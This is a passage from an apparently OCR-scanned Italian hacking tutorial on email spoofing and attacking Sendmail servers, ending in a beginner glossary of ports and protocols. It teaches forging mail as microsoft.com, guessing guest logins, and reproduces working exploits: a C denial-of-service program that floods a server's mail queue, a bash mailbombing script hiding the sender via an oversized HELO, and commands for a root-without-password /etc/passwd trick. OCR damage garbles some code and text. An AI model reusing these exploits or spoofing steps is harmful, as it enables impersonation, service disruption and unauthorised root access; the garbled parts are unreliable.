indirizzo IP. Puoi trovare l'hostname dell'IP (la maggior parte degli IP ha un hostname) digitando 
‘nslookup indirizzo-ip' senza le virgolette su un sistema Unix o andando su www.samspade.org e 
usando 

il loro programma di ricerca DNS(17). Se tu ancora non riesci a ottenerlo prova un whois. 

Per superare questo problema, devi fare due cose: 

1) Mandare quest'e-mail dal server Sendmail di microsoft. 

2) Mandare quest'e-mail da un account che è connesso al web tramite microsoft. Se non puoi averne 
uno, 

ciò mostrerà chiaramente nelle proprietà che la mail non è stata mandata da microsoft. 


Nota: un bel trucco per infilare qualcuno: se il tuo ISP è bla.com, puoi mandare ai tuoi amici un e-mail 
da admin@bla.com che sembrerà al 100% autentica! 


Comunque, i prossimi pochi caratteri ci daranno il MID (Message ID), in aggiunta agli altri pezzi di 
informazioni. Avevo promesso che avremmo trattato del MID, non è vero? 

Se tu pensi che qualcuno ti sta giocando uno scherzo facendoti credere di essere qualcun'altro, 
manda un e-mail a abuse@tuo.ISP.it oppure abuse@server.che.contiene.il.MID.com . 

Per sapere quale server contiene il MID, abbiamo bisogno di saltare un pò di linee (due attualmente - 
time e data) e andare diritto a questo: Message-ID: 


Message-ID: <199907092355. CAA15313@alpha.someone.com> 


Aha! Guarda questi interessanti numeri! E osserva questo: CAA15313@alpha.someone.com! Questo 
significa 

che tutte le informazioni riguardanti il MID sono contenute presso alpha.someone.com! Mandiamo 

un email a abuse@alpha.someone.com e diciamo loro che noi pensiamo di aver ricevuto un'email falsa, 
includendo tutte le proprietà. La prossima cosa che faremo sarà la stessa con l'ISP del mittente 

(nel nostro caso, il mittente è someone.hostname.crap.com [62.0.146.225], che significa che 
probabilmente 

il suo ISP è crap.com). 


Adesso passiamo alla prossima linea: 


X-Authentication-Warning: alpha.someone.com: some.hostname.crap.com [62.0.146.225] didn't use 
HELO protocol 


Dannazione! Sapevo di aver dimenticato qualcosa! Adesso facciamo tutto ancora una volta, ma questa 
volta 
scriveremo HELO microsoft.com all'inizio. 


HELO microsoft.com 
Otteniamo questo: 
250 smtp.netvision.com Hello some.hostname.crap.com [62.0.146.225], pleased to meet you 


Il resto è esattamente come l'ultima volta (mittente,rcpt to, ecc..). Adesso vediamo cosa avrebbe 
ricevuto 
vitt@lmer.it . 


Aha! Nessuno X-Authentication-Warning! 


Note finali 

Spero che questo capitolo ti sia piaciuto. Adesso hai imparato come fare scherzi inoffensivi e legali ai 
tuoi amici, come scoprire email false e come è facile acchiapparti se fai cose illegali. 

Oh, a proposito, c'è un modo per nascondere il tuo IP/hostname quando falsifichi e-mail... 

per maggiori informazioni leggi la seconda sezione nel capitolo 'Okay, io posso hackerare un host che 
esegue 

Sendmail. Come lo posso fare?". 


Hackerare un server? Attraverso Sendmail?! 


Yeah, sicuro, perchè no? Mi spiego, OGNI servizio(3) è vulnerabile a qualche attacco. 

Per questo io raccomando di eseguire quanto meno servizi possibile sul tuo computer. 

Ma il più vulnerabile di tutti è Sendmail (per questo è chiamato "il daemon più buggato 
sulla terra' o ‘il daemon più buggato sul pianeta"). Un membro di una mailing list una volta 
mi disse che non poteva proprio aspettare di leggere il tutorial su Sendmail (questo accadde 
prima che rilasciassi questo manuale) e che egli stesso eseguiva Sendmail sul suo computer. 
Eseguire Sendmail su un pc è inutile e pericoloso. Se il tuo computer non ha la funzione di 
server per la posta, non c'è alcuna ragione per cui tu dovresti eseguire Sendmail (a meno 
che tu non voglia che le persone mandino la posta da tuo-account@tuo.ip invece di 
tuo-account@tuo.ISP.it . Nota circa tuo-account: nel primo indirizzo, tuo-account è il nome 
del tuo username o del tuo computer (gli utenti di Unix dovrebbero sapere di cosa sto parlando). 
Nel secondo indirizzo tuo-account è il tuo username del tuo ISP). 

Nota: le informazioni in questo capitolo possono anche essere usate per hackerare server, o 
vice versa per proteggere il tuo server. Per favore non infrangere la legge, o almeno 

non spifferate il mio nome durante le indagini... =) 


Okay. la prima cosa che dobbiamo fare per hackerare un server attraverso un servizio specifico 

(o per migliorarne la sicurezza) è sapere la versione del servizio. Questo può essere facilmente 
fatto vedendo il daemon banner(4). Supponiamo che abbiamo sottocchio un computer che esegue 
Sendmail 8.8.3 (che era abbastanza vecchio quando questo tutorial è stato scritto, il che 

significa che dovrebbe avere un mucchio di bugs. Sendmail è upgradato principalmente quando un 
nuovo bug viene scoperto. In fatti, ogni cosa eccetto la sicurezza del daemon è raramente 
cambiata durante gli upgrades). 

La prossima cosa che andremo a determinare è l' OS (Operating System) che esegue questo daemon. 
Se il daemon banner non ce lo dirà, il daemon Telnet(19) lo farà. Prima collegati tramite telnet 
alla porta 23 e incrocia le dita. Se c'è un daemon su quella porta, è sicuramente il daemon 

telnet, e probabilmente ti darà il nome e la versione dell'OS. Se no, puoi sia: 

1) Provare a cercare per un guest account (username: guest password:guest, username:newuser 
password:newuser), poichè alcuni sistemi danno certe informazioni solo dopo che ti sei loggato. 

2) Mandare un e-mail a almin@tuo-obbiettivo.it e chiedergli (io consiglio aprendo un mailbox 

su uno di questi servizi di mailbox gratuiti come hotmail e mandando da lì, in quanto alcuni 
admnin(22) potrebbero avere qualche sospetto...) 

3) Provare ad andare sul sito del tuo bersaglio. Questo genere di informazioni potrebbe esserci, 
qualche volta (mahhh...) 


Se non hai trovato ancora l'OS, non temere! Siamo ancora capaci di fare un fantastico hackeraggio 
senza quest'informazione, ma tuttavia questa informazione potrebbe venirci in aiuto, così fai 
di tutto per ottenerla! 


La prossima cosa, navigherai su alcuni database online finchè avrai trovato il buco che stai 
cercando. Prima di tutto ti mostrerò i più grandi e raccomandati database online, e poi ti 
insegnerò come cercarli, oltre ad alcuni concetti di valore e parole che ti debbono essere familiari. 


Packet Storm Security 

+++++++++++++++++++++4+4++4+++++++++++ 

URL:http://packetstorm.security.com 

Uno dei più grandi database online per informazioni riguardanti la sicurezza. Io raccomando 

di andarci almeno una volta al giorno e leggere la sezione 'New Files Today', che tu stia cercando 
un specifico buco o no. 

L'archivio fu fondato da Ken Williams e ottiene centinaia di migliaia di visite la settimana. 

E' stato recentemente trasferito nella proprietà di Kroll-O-Nagra (www.security.com). 


Security Focus 

++++++++++++++++++++++++++++++++++++ 
URL:http://www.securityfocus.com 

Un altro database completo. Aggiornato giornalmente. Qui i ragazzi non dormono mai! 


BugTraq 

++++++++++++++++++++++++++++++++++++ 

URL: ospitato da Security Focus, precedentemente ospitato da Netspace 

BugTraq è una delle migliori mailing list. La lista è moderata, il che significa che se tu 

trovi un nuovo buco nella sicurezza, puoi solo mandare il tuo messaggio al moderatore, Aleph1 
(aleph1@undergound.org). Aleph1 filtra tutta la spazzatura, i messaggi dei lamers, e i vecchi 


bugs e spedisce solo le cose utili alla lista. 

To consiglio di segnarsi a www.securityfocus.com. Puoi anche solo cercare nel loro archivio, 
che è a proposito il mio database preferito, andando a securityfocus.com e cercando un link 
chiamato 'search'. 


Ricerca 

AA AAA AAA 

Se stiamo cercando un bug in Sendmail 8.8.3, dobbiamo digitare le seguenti parole chiave 
"sendmail 8.8.3" (senza le virgolette). Se cerchiamo qualcosa di specifico, come un attacco 
locale DoS(29) contro una qualsiasi versione di Sendmail, useremo le seguenti parole chiave: 
‘local DoS Sendmail' ecc... 


Ricerca Packet Storm 

++++++++++++++++++++++++ 

Packet Storm dovrebbe avere un motore di ricerca da qualche parte (Ken cambia la grafica ogni 
tanto quindi non posso darti l'esatta posizione). Puoi dividere i risultati della ricerca che 

otterrai in due categorie: testi e programmi. 

Per esempio: hai cercato un buco specifico e hai ottenuto un paio di files di testo e un paio di 
programmi. I files di testo spiegano i bug e come sfruttarli, mentre i programmi usano il buco per 
riuscire ad entrare. Questi programmi sono spesso chiamati 'exlploits' e generalmente sono costituiti 
da un codice sorgente invece che da un file binario. Lasciatemi spiegare: un file binario è qualsiasi 
file non fatto di testo. Files eseguibili sono in genere files binari. Adesso, nel nostro caso, 

i programmi sono dati come codici sorgenti invece che binari. Il codice sorgente si converte in 

un eseguibile binario (eccetto i codici sorgenti scritti in Perl, che possono essere eseguito 

sotto forma di codice se si ha il programma giusto). Comunque, questi programmi sono dati come 
codici sorgente per darti la possibilità di capire come lavorano e non di eseguirli ciecamente. 


Ricerca Security Focus 

+++++++++++++++++++++++++ 

Security Focus offre informazioni più organizzate. Invece di vari pezzi di informazioni, security 
focus offre articoli. Questi includono l'esatta definizione del bug, dove e quando si può verificare, 
come risolverlo ecc... L'unico difetto di security focus è che è più piccolo degli altri database. 


BugTraq 

+++4+++++++ 

Ah... il mio database preferito. Quando le persone inviano qualche messaggio a bugtraq circa un buco 
nella sicurezza che hanno trovato, le altre persone possono rispondergli e condividere il loro punto 

di vista. Per esempio: se il difetto persiste anche sul loro computer, come risolvere il bug in vari 
modi, cosa causa il bug in primo luogo ecc... Puoi compilare un database con tutte le informazioni 
necessarie semplicemente leggendo un paio di lettere. 


Venire acchiappati 
DR AR AR AR Ae Ae AR AR AR RAR AAA AAA AAA 


Se stai progettando di fare qualcosa di cattivo, per favore non farlo. Puoi essere acchiappato. 
Crackers migliori di te già sono stati acchiappati. Non essere stupido. 


Okay, io posso hackerare un host che esegue Sendmail. Come lo posso fare? 


Ho fatto una simpatica lista di alcuni buchi nella sicurezza riguardanti Sendmail giusto per dartene un 
idea. 


Un DoS(29) locale in tutte le versioni di Sendmail superiori alla 8.9.3 (preso da packet storm) 
bicicialatolcolcicloicioiatatatazorolcicoicici ai ai ai aiaioiciciciciciaiai i aicicicicicicici iii iiicicicicioii iii 
Date: Sat, 3 Apr 1999 00:42:56 +0200 From: "[iso-8859-2] Micha? Szymafiski" 

To: BUGTRAQ@netspace.org 

Subject: Re: Possible local DoS in sendmail 


Ciao gente, 


Questo attacco queue filling DoS in sendmail è abbastanza pericoloso. Ma una buona politica di 
sicurezza 

(come la mia) preventiverà attacchi che facciano queste cose. Files di controllo (in /var/spool/mqueue) 
creati con 'sendmail -t' sono posseduti da root.attacker's_group; cambia le quote per il gruppo 
‘attacker's_group' sul file system contenete il directory /var/spool/mqueue, e il tuo host non sarà 

più vulnerabile. 

Ancora più pericolosi sono gli attacchi queue filling DoS remoti. Se ti è consentito ritrasmettere, puoi 
usare il programma mostrato sotto: smdos.c; riempirà abbastanza velocemente la partizione sul disco 
dove 

risiede /var/spool/mqueue. Dovresti notare un incremento di LA durante l'attacco; in contrasto con l' 
attacco DoS locale, i files di controllo creati da smdos.c sono posseduti da root, così è più 

difficile prevenire attacchi da esso; 


Non dimenticare di cambiare la definizione di BSIZE (in smdos.c) all'appropriata limitazione della 
grandezza 

del messaggio host della vittima (MaxMessageSize option); puoi anche incrementare la definizione di 
MAXCONN. 

smdos.c: 


Viti 
By Michal Szymanski <siwa9@box43.gnet.pl> 


Sendmail DoS (up to 8.9.3); 


Sat Apr 3 00:12:31 CEST 1999 
Si 


#include <stdio.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#include <errno.h> 


#undef VERBOSE /* define it, if MORECONN is undefined */ 
#define MORECONN 

Il #define RCPT_TO "foo@ftp.onet.pl" 

#define RCPT_TO "foo@10.255.255.255" 


#ifdef MORECONN 
#define MA XCONN 5 
#endif 


#define BSIZE 1048576 /* df* control file size */ 
#define PORT 25 


char buffer[BSIZE]; 
int sockfd,x,loop,chpid; 


void usage(char *fname) { 

fprintf(stderr,"Usage: %s <victim_host>\n",fname); 
exit(1); 

} 


void say(char *what) { 


if (write(sockfd,what,strlen(what))<0) { 
perror("write()"); 
exit(errno); 


} 


#ifdef VERBOSE 
fprintf(stderr,"<%s",what); 
#endif 


bzero(buffer,BSIZE); 
usleep(1000); 


if (read(sockfd,buffer, BSIZE)<0) { 
perror("read()"); 
exit(errno); 


} 


#ifdef VERBOSE 
fprintf(stderr,buffer); 
#endif 

} 


int main(int argc,char *argv[ ]) { 
struct sockaddr_in serv_addr; 
struct hostent *host; 

char *hostname,hostaddr[20]; 


fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9 [siwa9@box43.gnet.pl]\n"); 
if (argc<2) usage(argv[0]); 

#ifdef VERBOSE 

fprintf(stderr,">Preparing address. \n"); 

#endif 


hostname=argv[1]; 


serv_addr.sin_port=htons(PORT); 
serv_addr.sin_family=AF_INET; 


if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1) { 


#ifdef VERBOSE 
fprintf(stderr,">Getting info from DNS.\n"); 
#endif 


if ((host=gethostbyname(hostname))==NULL) { 
herror("gethostbyname()"); 
exit(h_errno); 


} 

serv_addr.sin_family=host->h_addrtype; 

bcopy(host->h_addr,(char *)&serv_addr.sin_addr,host->h_length); 

#ifdef VERBOSE 

fprintf(stderr,">Official name of host: %s\n",host->h_name); 

#endif 

hostname=host->h_name; 

sprintf(hostaddr,"%d.%d.%d.%d",(unsigned char)host->h_addr[0], 
(unsigned char)host->h_addr[1], 


(unsigned char)host->h_addr[2], 
(unsigned char)host->h_addr[3]); 


} 


else sprintf(hostaddr,"%s",hostname); 


#ifdef MORECONN 
for (;loop<MA XCONN;loop++) if (!(chpid=fork())) { 
#endif 


for(;;) { 
bzero(&(serv_addr.sin_zero),8); 


if ((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) { 
perror("socket()"); 
exit(errno); 


} 


if ((connect(sockfd, (struct sockaddr *)&serv_addr,sizeof(serv_addr))) == -1) { 
perror("connect()"); 
exit(errno); 


} 


#ifdef VERBOSE 
fprintf(stderr,">Connected to [%s:%d].\n",hostname,PORT); 
#endif 


bzero(buffer,BSIZE);read(sockfd,buffer, BSIZE); 
#ifdef VERBOSE 

fprintf(stderr,buffer); 

Helse 

fprintf(stderr,"."); 

#endif 


say("helo foo\n"); 

say("mail from:root@localhost\n"); 
say("rcpt to:" RCPT_TO "\n"); 
say("data\n"); 


for (x=0;x<=BSIZE;x++) buffer[x]='X'jwrite(sockfd,buffer,BSIZE); 
say("\n.\n"); 

sleep(1); 

say("quit\n"); 

shutdown(sockfd,2); 

close(sockfd); 

#ifdef VERBOSE 


fprintf(stderr,">Connection closed succesfully.\n"); 
#endif 


} 

#ifdef MORECONN 

; 

waitpid(chpid, NULL,0); 
#endif 

return 0; 


Bug nel comando HELO di Sendmail (preso da rootshell.com) 


3 AE Ae Ae e e SE Ae Ae Ae Sie SE Ae Ae Sie Se E AE Ae Ae e AAA ARR AAA 


Nota: questo non ti darà l'accesso root(14), ma è lo stesso abbastanza figo. In fatti ti permette di 
nascondere il tuo IP/hostname quando invii una e-mail falsa!!! 


[http://www.rootshell.com] 

Noi avevamo questo exploit da gennaio ma non l'abbiamo archiviato finchè tutti hanno implementato 
una versione stabile di Sendmail 8.9.x. (e perchè l'ultima cosa che voglio è aiutare gli sppammers) 

E' stato fatto cos' su Bugtraq per evitare ulteriori problemi. 


--Rootshell 5/28/98 


Date: Fri, 22 May 1998 12:36:54 +0300 
From: Valentin Pavlov 
Subject: about sendmail 8.8.8 HELO hole 


To ritengo che questo sia abbastanza vecchio (10 gennaio 1998) ma ancora... 

Ho trovato un semplice modo per nascondere l'IP del mittente. Il metodo per nascondere l'IP 
è descritto sotto. Adesso, se vogliamo tenere traccia di simili tentativi di exploit, dobbiamo 
compilare sendmail 8.8.8 con un PICKY_HELO_CHECK definito in conf.h: 


#define PICKY_HELO_CHECK 1 

Questo forzerà sendmail a emettere un pericolo di identificazione (messaggio con livello LOG_INFO) 
e includere u X-Autentication-Warning nelle proprietà del messaggio dicendo che l'host ha provato 

a nascondersi. Verifica il sorgente (srvrsmtp.c,main.c). Ancora, LogLevel deve essere settato a un 


valore più alto di 3 (9 è default) in sendmail.cf. 


saluti 
capone 


Adesso per il messaggio originale, che descrive l'exploit: 


From: Micha3 Zalewski 

To: info@rootshell.com 

Date: 10 stycznia 1998 12:28 

Subject: Sendmail 8.8.8 (qmail?) HELO hole. 


Qui c'è una breve descrizione di un buco d Sendmail (gmail) che ho trovato recentemente: 


Quando qualcuno ti mailbomba, o prova a mandarti una e-mail falsa, spam, ecc.. - sendmail 
normalmente 
attacca hostname del mittente e il suo indirizzo nel messaggio in uscita: 


>From spam@flooders.net Mon Jan 5 22:08:21 1998 

Received: from spammer (marc@math.university.edu [150.129.84.5]) 
by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376 

for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100 

Date: Mon, 5 Jan 1998 22:07:54 +0100 

From: spam@flooders.net 

Message-Id: <3.14159665@pi> 


MAILBOOM!!! 


Questo è perfetto - adesso sai, chi è il responsabile per quelle noiose fesserie nel tuo mailbox: 
"Received: from spammer (marc@math.university.edu [150.129.84.5])". Niente di più facile... Ma io 
trovai un piccolo buco, che permette all'utente di nascondere le sue generalità e di mandare 

messaggi anonimamente. La sola cosa che devi fare è passare al comando HELO una stringa più lunga 
di 1024 caratteri circa. La locazione del mittente e altre informazioni molto importanti saranno 
tagliati!!!! Le proprietà del messaggio diventeranno non interessanti. Qualche volta, il mittente 

può diventare abbastanza non rintracciabile (ma non sempre, se è possibile ottenere i logs dalla 
macchina da cui è stato mandato il messaggio): 


>From spam@flooders.net Mon Jan 5 22:09:05 1998 
Received: from xxXXXXXXxXXXXXx... [molte 'x' dopo...] ...XXxXx 
Date: Mon, 5 Jan 1998 22:08:52 +0100 

From: spam@flooders.net 

Message-Id: <3.14159665@pi> 


MAILBOOM!!! Adesso indovina chi sono... 


Qui c'è un piccolo esempio del buco del comando HELO di sendmail. Nota, questo script è stato scritto 
solo per mostrarti quanto può essere facile mandare e-mail false, mailbomb, con la cooperazione di 
Sendmail ;) Lo script è molto lento e restrittivo in molti casi, ma spiega bene il problema. 


(nota, alcuni daemons non di Berkeley sono anche affetti, probabilmente Qmail??): 


-- EXPLOIT CODE -- 
#!/bin/bash 
TMPDIR=/tmp/ whoami° 
PLIK=$TMPDIR/.safe 
TIMEOUT=2 

LIMIT=10 

MAX=20 


echo 

echo "SafeBomb 1.02b -- sendmail HELO hole usage example" 
echo "Author: Michal Zalewski " 

echo 


if [ "$4" = "" ]; then 

echo "USAGE: $0 msgfile address server sender" 

echo 

echo " msgfile - file to send as a message body" 

echo " address - address of lucky recipient" 

echo " server - outgoing smtp server w/sendmail" 

echo " sender - introduce yourself" 

echo 

echo "WARNING: For educational use ONLY. Mailbombing is illegal." 
echo "Think twice BEFORE you use this program in any way. Also," 
echo "I've never said this program is 100% safe nor bug-free." 

echo 

sleep 1 

exit 0 

fi 


if[!-f$1]; then 

echo "Message file not found." 
echo 

exit 0 

fi 


echo -n "Preparing message..." 

mkdir $TMPDIR &>/dev/null 

chmod 700 $TMPDIR 

echo "echo \"helo 
___safebomb__safebomb__safebomb>$PLIK 
echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK 
echo "echo \"rcpt to: $2\"" >>$PLIK 

echo "echo \"data\"" >>$PLIK 

echo "cat <<__qniec__" >>$PLIK 

cat $1 >>$PLIK 

echo "__qniec__" >>$PLIK 


echo "echo \".\"" >>$PLIK 

echo "echo \"quit\"" >>$PLIK 

echo "sleep $TIMEOUT" >>$PLIK 
chmod +x $PLIK 

echo "OK" 


echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort." 
SENT=0 


while [ -f $1 ]; do 

$PLIK|telnet $3 25 &>/dev/null & 

let SENT=SENT+1 

echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b" 
CONNECTED= pslgrep -c "telnet $3"° 

if [ "$8LIMIT" -le "8CONNECTED" ]; then 
while [ "$LIMIT" -le "$8CONNECTED" ]; do 
sleep 1 

done 

fi 

if [ "$SENT" -ge "$MAX" ]; then 

echo "It's just an example, sorry." 

echo 

exit 0 

fi 

done 

-- EOF -- 


fix suggerito: inserire una addizionale lunghezza limite nei parametri di HELO/EHLO verificando 
le routine o disabilitando AllowBogusHELO (ma potrebbe causae seri problemi). Io non ho i sorgenti 
dell' 8.8.8 al momento, per questo mi scuso per mancanza di chiarezza. 


PS: 


From: Gregory Neil Shapiro 
Io sono capace di riprodurre il problema delle proprietà allungando la stringa di HELO nel tuo script. 


[za 
Questo sarà fissato in sendamail 8.9. 


Micha3 Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl] 
Iterowa® jest rzecz+ ludzk+, wykonywa@ rekursywnie - bosk+ [P. Deustch] 
= [ echo "while [ -f \$0 ]J; do \$0 &;done" >_;. _ ] --------- = 


Giant Bug in Sendmail 8.8.4 (taken from hackersclub.com) 
DR AR AR Ae Ae Ae Ae AR SR AAA AA AR ARR RARA AAA 


sendmail 8.8.4 exploit 
"Sendmail? 'è il programma più buggato!" -phriend- 


Ok, qui c'è una breve e interessante spiegazione di questo interessante exploit. Questo exploit usa 

la versione 8.8.4 di sendmail e richiede che tu abbia uno shell account sul server in questione. 
Questo exploit crea un link da etc/passwd a /var/tmp/dead.letter molto semplice veramente. Ecco 
come lavora, sotto ci sono gli esatti comandi che devi digitare (per quelli handicappati tecnicamente) 


* In /etc/passwd /var/tmp/dead.letter 

* telnet target.host 25 

* mail from: nonexsistent@not.an.actual.host.com 
* rcpt to: nonexsistent@not.as.actual.host.com 

* data 

* lord::0:0:leet shit:/root:/bin/bash 


* 


* quit 


Kaboom, hai fatto, collegati tramite telnet alla porta 23 e loggati come lord, nessuna password 
richiesta. 
Grazie a un pò di lavoro, lord ha appena ottenuto gli stessi privilegi del root. 


Ci sono un paio di ragioni per cui potrebbe non lavorare. 


1. /var e / sono partizioni differenti (come già sai, non puoi fare un link tra differenti partizioni) 

2. C'è un account postmaster sulla macchina o mail alias, in questo caso, la tua posta finirà qui invece 
di essere scritta su etc/passwd 

3. /var/tmp non esiste o non è scrivibile pubblicamente 

Ducan Silver 

www.hackersclub.com/uu 

nota dell'editore: 'lord::0:0:leet shit:/root:/bin/bash' è una linea estratta da un file di password 

di Unix(33). 


Note finali 

Devi aver notato che non ho messo ogni cosa da BugTrag. Questo perchè ogni cosa a bugtrag ha 
almeno una 

risposta (dalla mia esperienza) , e io non gradisco spedire l'intero threads(34) (sono così dannatamente 
lunghi!) 


Angolo dei Newbies 


1. Daemon - un programma che è in attesa di una connessione su una porta specifica(2). Alcuni 
daemon possono ricevere comandi e interagire con te, altri possono semplicemnte emettere un pò di 
testo e uscire. 


2. Port - (per una spiegazione più tecnica di cosa sono le porte, guarda la fine di questa spiegazione) le 
porte 

sono come buchi che permettono alle cose (informazioni, in questo caso) di entrare. Ci sono porte 
fisiche e porte 

software sul tuo computer . Le porte fisiche sono quegli slot sul retro del computer, del monitor ecc... 
Le porte 

software sono usate quando ci si connette a un altro computer. 

Per esempio : ho appena comprato un computer e voglio convertirlo in un web server (voglio 
permettere alle 

persone di accedere a selezionate pagine web, immagini, cgi e java script o applet, programmi ecc.. che 
sono 

localizzati sul mio computer (sul MIO computer non su squallidi webhost gratuti come Geocities) e 
voglio che le 

persone facciano ciò utilizzando nient'altro che un browser). In ordine di quello che accade, io devo 
installare 

un programma webserver. 

Il programma webserver apre una porta sul mio computer chiamata porta 80 (questo numero può essere 
cambiato ma è 

il numero di default). Poi aspetta per connessioni in arrivo su quella porta. Quando qualcuno naviga il 
mio sito 

col suo browser (Netscape, Lynx, internet explorer ecc..) si cornette alla porta 80 del mio computer e 
manda dei 

comandi HTTP che il mio programma webserver può capire. 

Il mio programma webserver rapidamente prende i dati che arrivano e li manda indietro in una porta 
che il browser 

apre sul computer del navigatore. Il browser attenderà su quella porta e aspetterà le informazioni (la 
pagina html, 

le immagini, ecc..) che giungono attraverso essa. 

Nota circa le porte non di default: se decidi di mettere, diciamo, un webserver su una porta non di 
default, sarà 

difficile per le persone accedervi. Se tu decidi di metterlo sulla porta... huummm... 8000 invece di 80, 
le persone 

dovranno digitare il tuo IP o il tuo hostname e aggiungere :8000 alla fine. Per esempio 
143.241.122.1:8000. 

Semplicemente digitando 143.241.122.1 nel capo per l'URL del tuo browser è lo stesso che digitare 
143.241.122.1:80, 

così è meglio mettere un webserver sulla porta 80 (a meno che tu vuoi che solo uno specifico gruppo di 
persone 

abbia quel numero per accedere al webserver, ma un tale blocco può essere facilmente crackato usando 
un portscanner(12)). 

Ci sono differenti porte per differenti servizi(3) così le informazioni non saranno mischiate. Immagina 
che il tuo 

browser prenda dati che si suppone debba prendere il tuo client ftp! 

To spero tu abbia l’idea di cos’è una porta. 

Allora, ci sono tre tipi di porte: le porte ben conosciute, quelle registrate e quelle dinamiche/private. 
Le porte ben conosciute sono quelle dalla 0 alla 1023,. Queste sono porte di default per diversi servizi. 
Per 


esempio: la porta di default per i webserver è 80. Altrimenti come potrebbe conoscere il tuo browser a 
quale 

porta deve accedere? 

Allora, le porte registrate sono quelle dalla 1024 alla 49151. Queste porte sono riservate per alcuni 
programmi. 

Per esempio: ICQ (www.icq.com) riserva alcune porte per ascoltare vari eventi che arrivano (messaggi, 
trasferimenti di file, ecc..) attraverso esso. Le porte dinamiche/private sono quelle dalla 49152 alla 
65535, 

e possono essere usate da ognuno per ogni scopo. 


Nota importante per le porte ben conosciute: i servizi su queste porte possono essere solo eseguiti da 
root, 
così gli utenti inferiori non incominceranno a incasinare porte importanti. 


3. Services - un daemon che permette a ognuno che si connette a esso (o a uno specifico gruppo di 
persone. 

Per esempio: tutti quelli con lo stesso range di IP, quelli che conoscono la password segreta, ecc..) di 
usare 

alcuni tipi di servizi. 

Per esempio: un webserver come quello descritto nella sezione 1 di questo capitolo è un servizio poiché 
permette 

alle persone di accedere e richiedere alcuni pezzi di dati. 

Il più semplice esempio di servizio a cui posso pensare è “daytime”. Il daytime attende connessioni 
sulla porta 

13 e quando qualcuno ci va, immediatamente annuncia l’ora corrente sul computer che lo esegue 
(senza bisogno 

che tu digiti comandi o password o altre cose). Semplice... 


4. Daemon banner - la maggior parte dei daemon restituiscono alcune informazioni tecniche su alcuni 
punti a chi 

si connette a essi. Queste informazioni possono essere usate da chiunque si connette a questo daemon 
semplicemente 

per conoscere come interagire con esso meglio (quel daemon è, che versione, ecc..), ma esso può essere 
usato 

dagli hackers. 

Colleghiamoci alla porta 23 di someone.com (nota: io ho creato questo hostname e tutti i dettagli esso 
riguardanti semplicemente per spiegarti i daemon banners. Io realmente non so se esiste un tale 
hostname e 

se i dettagli che ti ho dato sono corretti). Sulla porta 23 potresti trovare di solito il telnet(19). Telnet 

è un servizio che chiede un username e una password nella maggior parte dei casi (a meno che tu non 
digiti un 

username non protetto da password. In quel caso semplicemente ti loggherà come un utente a cui non è 
stata 

richiesta password) e poi esegue un programma specificato dal sysadmin(22) e ti lascia lavorare con 
esso. Nella 

maggior parte dei casi userai una text-based shell (un interprete di comandi(20)). Il problema è: tu non 
puoi 


fare tutto. Tutto dipende da che genere di permessi ha l’users con il quale ti sei loggato. L’user root(14) 
ha 

tutti i permessi (legge, scrive (e cancella) e esegue ogni cosa e cambia i permessi delle altre persone). 
Okay, proviamo a collegarci alla porta 23 su someone.com . All’inizio otteniamo questo: 


Welcome to someone.com, running Laccetti 1.0 
Login: 


Aha! Someone.com sta girando su un sistema operativo chiamato Laccetti 1.0! Dovrebbe essere 
qualcosa di valore 

(noi potremmo cercare un bug segnalato riguardante Laccetti 1.0 e questo potrebbe renderci capaci di 
hackerare 

questo server ). Ogni parte di informazione su un webserver è importante. 

Adesso, poiché non sappiamo un username e una password per questo server potremmo anche 
terminare la connessione 

o provare a indovinare. La maggior parte dei server hanno un guest account (username: guest, 
password:guest o 

solo l’username:guest) o un newuser account (username:newuser, password:newuser o solo 
username:newuser), ma 

questo certamente non ci aiuta ad hackerare questi ragazzi... a meno che c’è un buco maggiore in 
questi accounts. 

Tu dovrai immaginare queste cose da solo. 

Nota su la parola server: un computer è chiamato server se offre servizi. Altrimenti, è chiamato host. 


5. Timeout - Okay, adesso ho un daemon che aspetta connessioni sulla porta 23. Adesso, cosa accade 
se qualcuno 

si connette ad esso e non fa assolutamente nulla? Egli potrebbe semplicemente rimanere connesso 
finchè uno di noi 

o resetta o chiude la connessione. Non vuoi che qualcuno si connetta a qualche porta sul tuo computer e 
ci rimanga 

solo collegato, non è vero? Questo potrebbe solo sprecare bandwith(15) di valore! 

Le persone non vorranno monitorare lo stato del loro network 24 ore al giorno e disconnettere ognuno 
che decide 

di aspettare finchè resta collegato (specialmente su grandi network). Per questo è stato inventato il 
Timeout. 

Settando un valore di timeout su un daemon (questo può essere fatto durante il processo di setup o 
lanciando 

un programma di setup o entrando in alcuni tipi di box di opzioni) puoi chiudere la connessione a 
ognuno che 

si connette a esso e non fa nulla per un valore di tempo superiore al timeout. Per esempio: tu metti un 
daemon 

sulla porta 17 e setti il timeout dopo 2,5 secondi. Se qualcuno si connette al tuo daemon e non digita 
nulla 

per un tempo superiore ai 2,5 secondi, gli verrà chiusa la connessione e quella persona dovrà 
riconnettersi 

e cominciare a digitare qualcosa prima che il tempo scada e venga cacciato. 

Questo è il motivo per cui i webserver hanno un breve timeout di 2 secondi (la maggior parte delle 
persone 


si connette ai webserver usando programmi client(16), e questi programmi digitano davvero 
velocemente...). 


6. TCP - sta per Transfer Control Protocol. TCP è un protocollo che è usato per trasferimenti di dati 
attraverso network (internet, networks locali, ecc..). TCP è molto più affidabile di UDP poiché usa 
alcune precauzioni, come numeri sequenziali e tutti i tipi di flags di header ingegnosi e tutti (vedi 
l’eccellente articolo chiamato ‘IP spoofing Demystified’ nella Books Section in blacksun.box.sk per 
molte informazioni su UDP (veramente DA LEGGERE!!)). 

Il solo svantaggio di TCP è che è un po’ più lento dell’UDP, ma è più affidabile, perciò è usato per 
trasferire files delicati (come programmi - se tu perdi un singolo bit del file l’intera cosa è 
inutilizzabile). 


7. UDP - sta per User Datagram Protocol. UDP è un protocollo usato per trasferire dati attraverso 
networks (internet, networks locali, ecc..). UDP è meno affidabile di TCP, ma tuttavia è un po’ più 
